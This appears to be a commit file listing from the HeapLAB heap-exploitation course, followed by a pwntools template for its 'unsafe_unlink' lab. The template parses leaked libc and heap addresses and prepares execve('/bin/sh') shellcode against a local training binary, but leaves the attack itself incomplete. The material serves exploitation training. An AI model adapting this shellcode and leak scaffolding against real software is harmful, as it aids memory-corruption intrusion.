ba02c1bd69
new file: HeapLAB/.glibc/glibc_2.23/ld-2.23.so new file: HeapLAB/.glibc/glibc_2.23/ld.so.2 new file: HeapLAB/.glibc/glibc_2.23/libc-2.23.so new file: HeapLAB/.glibc/glibc_2.23/libc.so.6 new file: HeapLAB/.glibc/glibc_2.23/libio/genops.c new file: HeapLAB/.glibc/glibc_2.23/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2 new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6 new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c new file: HeapLAB/.glibc/glibc_2.23_unsafe-unlink/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.24/ld-2.24.so new file: HeapLAB/.glibc/glibc_2.24/ld.so.2 new file: HeapLAB/.glibc/glibc_2.24/libc-2.24.so new file: HeapLAB/.glibc/glibc_2.24/libc.so.6 new file: HeapLAB/.glibc/glibc_2.24/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.25/ld-2.25.so new file: HeapLAB/.glibc/glibc_2.25/ld.so.2 new file: HeapLAB/.glibc/glibc_2.25/libc-2.25.so new file: HeapLAB/.glibc/glibc_2.25/libc.so.6 new file: HeapLAB/.glibc/glibc_2.25/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.26/ld-2.26.so new file: HeapLAB/.glibc/glibc_2.26/ld.so.2 new file: HeapLAB/.glibc/glibc_2.26/libc-2.26.so new file: HeapLAB/.glibc/glibc_2.26/libc.so.6 new file: HeapLAB/.glibc/glibc_2.26/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.26_no-tcache/ld-2.26.so new file: HeapLAB/.glibc/glibc_2.26_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.26_no-tcache/libc-2.26.so new file: HeapLAB/.glibc/glibc_2.26_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.26_no-tcache/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.27/ld-2.27.so new file: HeapLAB/.glibc/glibc_2.27/ld.so.2 new file: HeapLAB/.glibc/glibc_2.27/libc-2.27.so new file: HeapLAB/.glibc/glibc_2.27/libc.so.6 new file: HeapLAB/.glibc/glibc_2.27/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so new file: HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so new file: HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2 new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so new file: HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6 new file: HeapLAB/.glibc/glibc_2.28/ld-2.28.so new file: HeapLAB/.glibc/glibc_2.28/ld.so.2 new file: HeapLAB/.glibc/glibc_2.28/libc-2.28.so new file: HeapLAB/.glibc/glibc_2.28/libc.so.6 new file: HeapLAB/.glibc/glibc_2.28/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so new file: HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so new file: HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.29/ld-2.29.so new file: HeapLAB/.glibc/glibc_2.29/ld.so.2 new file: HeapLAB/.glibc/glibc_2.29/libc-2.29.so new file: HeapLAB/.glibc/glibc_2.29/libc.so.6 new file: HeapLAB/.glibc/glibc_2.29/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.29_no-tcache/ld-2.29.so new file: HeapLAB/.glibc/glibc_2.29_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.29_no-tcache/libc-2.29.so new file: HeapLAB/.glibc/glibc_2.29_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.29_no-tcache/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2 new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so new file: HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6 new file: HeapLAB/.glibc/glibc_2.30/ld-2.30.so new file: HeapLAB/.glibc/glibc_2.30/ld.so.2 new file: HeapLAB/.glibc/glibc_2.30/libc-2.30.so new file: HeapLAB/.glibc/glibc_2.30/libc.so.6 new file: HeapLAB/.glibc/glibc_2.30/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.30_no-tcache/ld-2.30.so new file: HeapLAB/.glibc/glibc_2.30_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.30_no-tcache/libc-2.30.so new file: HeapLAB/.glibc/glibc_2.30_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.30_no-tcache/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.31/ld-2.31.so new file: HeapLAB/.glibc/glibc_2.31/ld.so.2 new file: HeapLAB/.glibc/glibc_2.31/libc-2.31.so new file: HeapLAB/.glibc/glibc_2.31/libc.so.6 new file: HeapLAB/.glibc/glibc_2.31/malloc/malloc.c new file: HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so new file: HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2 new file: HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so new file: HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6 new file: HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c new file: HeapLAB/.src/demo_fastbins.c new file: HeapLAB/.src/demo_top_chunk.c new file: HeapLAB/.src/demo_unsortedbin.c new file: HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf new file: HeapLAB/challenge-fastbin_dup/.gdb_history new file: HeapLAB/challenge-fastbin_dup/bruh.py new file: HeapLAB/challenge-fastbin_dup/fastbin_dup_2 new file: HeapLAB/challenge-fastbin_dup/pwntools_template.py new file: HeapLAB/challenge-one_byte/one_byte new file: HeapLAB/challenge-one_byte/pwntools_template.py new file: HeapLAB/fastbin_dup/demo new file: HeapLAB/fastbin_dup/fastbin_dup new file: HeapLAB/fastbin_dup/pwntools_template.py new file: HeapLAB/house_of_force/demo new file: HeapLAB/house_of_force/house_of_force new file: HeapLAB/house_of_force/pwntools_template.py new file: HeapLAB/house_of_orange/house_of_orange new file: HeapLAB/house_of_orange/pwntools_template.py new file: HeapLAB/malloc_testbed/.links/ld.so.2 new file: HeapLAB/malloc_testbed/.links/libc.so.6 new file: HeapLAB/malloc_testbed/change_glibc_version.py new file: HeapLAB/malloc_testbed/malloc_testbed new file: HeapLAB/malloc_testbed/pwntools_template.py new file: HeapLAB/safe_unlink/pwntools_template.py new file: HeapLAB/safe_unlink/safe_unlink new file: HeapLAB/unsafe_unlink/demo new file: HeapLAB/unsafe_unlink/pwntools_template.py new file: HeapLAB/unsafe_unlink/unsafe_unlink new file: original.gz
73 lines
1.6 KiB
Python
Executable File
73 lines
1.6 KiB
Python
Executable File
#!/usr/bin/python3
|
|
from pwn import *
|
|
|
|
elf = context.binary = ELF("unsafe_unlink")
|
|
libc = elf.libc
|
|
|
|
gs = '''
|
|
continue
|
|
'''
|
|
def start():
|
|
if args.GDB:
|
|
return gdb.debug(elf.path, gdbscript=gs)
|
|
else:
|
|
return process(elf.path)
|
|
|
|
# Index of allocated chunks.
|
|
index = 0
|
|
|
|
# Select the "malloc" option; send size.
|
|
# Returns chunk index.
|
|
def malloc(size):
|
|
global index
|
|
io.send("1")
|
|
io.sendafter("size: ", f"{size}")
|
|
io.recvuntil("> ")
|
|
index += 1
|
|
return index - 1
|
|
|
|
# Select the "edit" option; send index & data.
|
|
def edit(index, data):
|
|
io.send("2")
|
|
io.sendafter("index: ", f"{index}")
|
|
io.sendafter("data: ", data)
|
|
io.recvuntil("> ")
|
|
|
|
# Select the "free" option; send index.
|
|
def free(index):
|
|
io.send("3")
|
|
io.sendafter("index: ", f"{index}")
|
|
io.recvuntil("> ")
|
|
|
|
io = start()
|
|
|
|
# This binary leaks the address of puts(), use it to resolve the libc load address.
|
|
io.recvuntil("puts() @ ")
|
|
libc.address = int(io.recvline(), 16) - libc.sym.puts
|
|
|
|
# This binary leaks the heap start address.
|
|
io.recvuntil("heap @ ")
|
|
heap = int(io.recvline(), 16)
|
|
io.recvuntil("> ")
|
|
io.timeout = 0.1
|
|
|
|
# =============================================================================
|
|
|
|
# =-=-=- EXAMPLE -=-=-=
|
|
|
|
# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
|
|
shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
|
|
|
|
# Request a small chunk.
|
|
small_chunk = malloc(0x88)
|
|
|
|
# Edit the small chunk.
|
|
edit(small_chunk, "X"*32)
|
|
|
|
# Free the small chunk.
|
|
free(small_chunk)
|
|
|
|
# =============================================================================
|
|
|
|
io.interactive()
|